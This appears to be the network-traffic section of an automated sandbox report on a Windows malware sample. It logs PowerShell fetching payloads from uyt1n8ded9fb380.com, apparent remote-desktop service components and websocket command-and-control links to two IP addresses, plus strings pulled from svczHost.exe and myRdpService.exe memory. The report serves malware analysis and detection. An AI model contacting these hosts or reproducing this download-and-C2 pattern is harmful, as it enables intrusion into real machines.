      Source: global trafficHTTP traffic detected: GET /file2/df74c18f34c2e710d864267392a9e7dd536421db41569695baf1b4e12a83cfb137d5fed4fab389dc3fe1f9d14e2ea9b0b1c6f436ead6c833a67fc34705a34ce37f99ec390c3f84cff14e2301a6a62566a46ff50f8be9ce2a5ac5ee46c1890e16fc40853878a3246bd074c17326c34158 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33a1ad49ca3cce39415efa5e154367a48c9b2235950ff73e0aa6e501ee70b1a57fd20e0e662cce5de5e764c8ea69e8f5460905e960f2da5e2d0f365f522005f31ce54fbcd4e6cc47d74d60a5e59c2a76ec HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /file2/67f0828de55a7b0ae4143def41be5826e35728fe516a68fd7776f4f474689bc6ab22273c73b70a1db6a1d1a5a722db57826cdbaf9bb1da919ab6b53967c4bf044fb82b81afdbf15569d5eccde03bc8c4a7a71498eb1d6b80d2600766aa798119e9744ccb9a12497618e8c21987262036 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
      Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec46903b0dfb975b9987fd6729e67c891c4b329b887232148c7de62a277aa7bb9f7bb172d0ba0fe9be28b36313fd0fe9b172de332f05512cd1a8b06a678d6fb6ee2d640939cb40f267bbf685fe9daffed49f6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/32 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/53 HTTP/1.1Host: uyt1n8ded9fb380.com
      Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: uyt1n8ded9fb380.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: rG4xY6l9GU61tyuh7IveiA==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 206.206.126.252:8008Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: J87z2mPEuUKm1EuLarywEw==Sec-WebSocket-Version: 13
      Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: NhGybyMvX0e72JtAxlQvsw==Sec-WebSocket-Version: 13
      Source: global trafficDNS traffic detected: DNS query: uyt1n8ded9fb380.com
      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
      Source: unknownHTTP traffic detected: POST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c3211874eaf2d7bf53485b09f44dc9fdc79407 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: uyt1n8ded9fb380.comContent-Length: 308
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S8gWulU9VBcbM3PyDBdjqwJgVV3sJnKq6Rk6CV64p7wh772cHuBVE0lFIqTXMzdRYNKNSm230hZyaE2bIxalmwGdqjs%2FMvY1%2Bl8bwBdtgeZrvJZdCkJunQDZfY3n8f%2FfncdZcPtYi6oJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4b6bdeb569a09-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=6915&sent=4190&recv=1575&lost=0&retrans=0&sent_bytes=3694721&recv_bytes=198676&delivery_rate=1839783&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 10:00:03 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{m
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lezFM%2Fl9gHu3mqbHgWcM0lKxlbb6H%2BhHn7aH5fh8H%2BrxXxMlhV%2B4sI%2FhPoH4desr%2Fa21WIY6kKahle4ZPQd5Uyl6t4tTrthicgRputp3RtWeMWHfDyndx4qh3OAJBkRFyIqclrWVTEbh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4b6d1af7f89bc-SINalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7073&sent=552&recv=385&lost=0&retrans=0&sent_bytes=459378&recv_bytes=48952&delivery_rate=6391494&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 10:00:06 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pr
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateUpgrade: websocketContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/8.5cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S7ostF2o7UKnGNgZzXXacFyv4RMQXdLcGci3oLFEgjYsEggDVS6NF64LV6lwFrYVrjt5dii%2BLyMw1xEFDV7HeEmZYNhWWXndhTLV0EibsM7NXhUrVrc%2BIeLfMeryVXteZsUPl5y4lG0a"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}CF-RAY: 8df4b7200ed9dbd8-FRAalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=7909&sent=995&recv=504&lost=0&retrans=0&sent_bytes=883143&recv_bytes=47742&delivery_rate=1855482&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"X-Powered-By: ARR/3.0Date: Fri, 08 Nov 2024 10:00:19 GMTContent-Length: 4852Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:
      Source: powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.css
      Source: powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.jpg
      Source: powershell.exe, 00000002.00000002.3126040586.0000023D4447E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2976234967.0000022EFF26D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3734795824.000001EE6CE12000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4140957795.00000179E67D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3669409196.000001DF29388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 00000002.00000002.3126040586.0000023D4447E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2963642408.0000022EE5348000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3732973453.000001EE6CE01000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4140957795.00000179E67D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3669409196.000001DF29388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000015.00000002.3695051605.000001DF296D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
      Source: powershell.exe, 00000019.00000002.3672185635.0000017AA7AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
      Source: powershell.exe, 0000000A.00000002.3746273742.000001EE6D1F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros=3
      Source: powershell.exe, 00000006.00000002.2978314235.0000022EFF6BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
      Source: powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://html4/loose.dtd
      Source: powershell.exe, 00000002.00000002.3120002105.0000023D3C4A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3120002105.0000023D3C633000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2974080588.0000022EF72B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF12754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3614783990.000001DF212D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3614783990.000001DF21417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.3129564568.0000023D44720000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://osoft.co
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzK
      Source: powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE55053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: svczHost.exe, svczHost.exe, 00000011.00000002.4147590392.00007FF78B14F000.00000004.00000001.01000000.00000009.sdmp, myRdpService.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
      Source: powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE7241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE54C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4147590392.00007FF78B14F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF11261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3348440701.0000017A8F7E1000.00000004.00000800.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE55053000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 0000000A.00000002.3324253534.000001EE56393000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uyt1n8ded9fb380.com
      Source: svczHost.exe, 00000011.00000002.4141517755.00000179E98AC000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4141517755.00000179E98A7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://uyt1n8ded9fb380.com:443/x
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzK
      Source: myRdpService.exeString found in binary or memory: http://www.gstatic.com/generate_204
      Source: svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://www.gstatic.com/generate_204y
      Source: powershell.exe, 00000006.00000002.2977462889.0000022EFF63A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://.AppV.AppVC
      Source: powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4147590392.00007FF78B14F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
      Source: powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3583871028.000001EE64D2F000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4147590392.00007FF78B14F000.00000004.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B2C1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000000.3297685999.00007FF78B2C1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EA248000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
      Source: svczHost.exe, myRdpService.exeString found in binary or memory: https://aka.ms/nativeaot-c
      Source: myRdpService.exe, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
      Source: myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityY
      Source: powershell.exe, 0000000A.00000002.3583871028.000001EE65535000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4147893541.00007FF78B3DA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4142460353.00000179EAB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002A.00000000.3817624914.00007FF6B8E6C000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibilityy
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C431000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE7241000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE54C91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF11261000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3348440701.0000017A8F7E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE5588C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3672185635.0000017AA7AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3324253534.000001EE5588C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpXzK
      Source: powershell.exe, 00000015.00000002.3614783990.000001DF21417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000015.00000002.3614783990.000001DF21417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000015.00000002.3614783990.000001DF21417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: svczHost.exe, 00000011.00000002.4142460353.00000179EA248000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/MartinKuschnik/WmiLight
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.3055105541.0000023D2C65A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2964848273.0000022EE74A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3350768794.000001DF1148D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzK
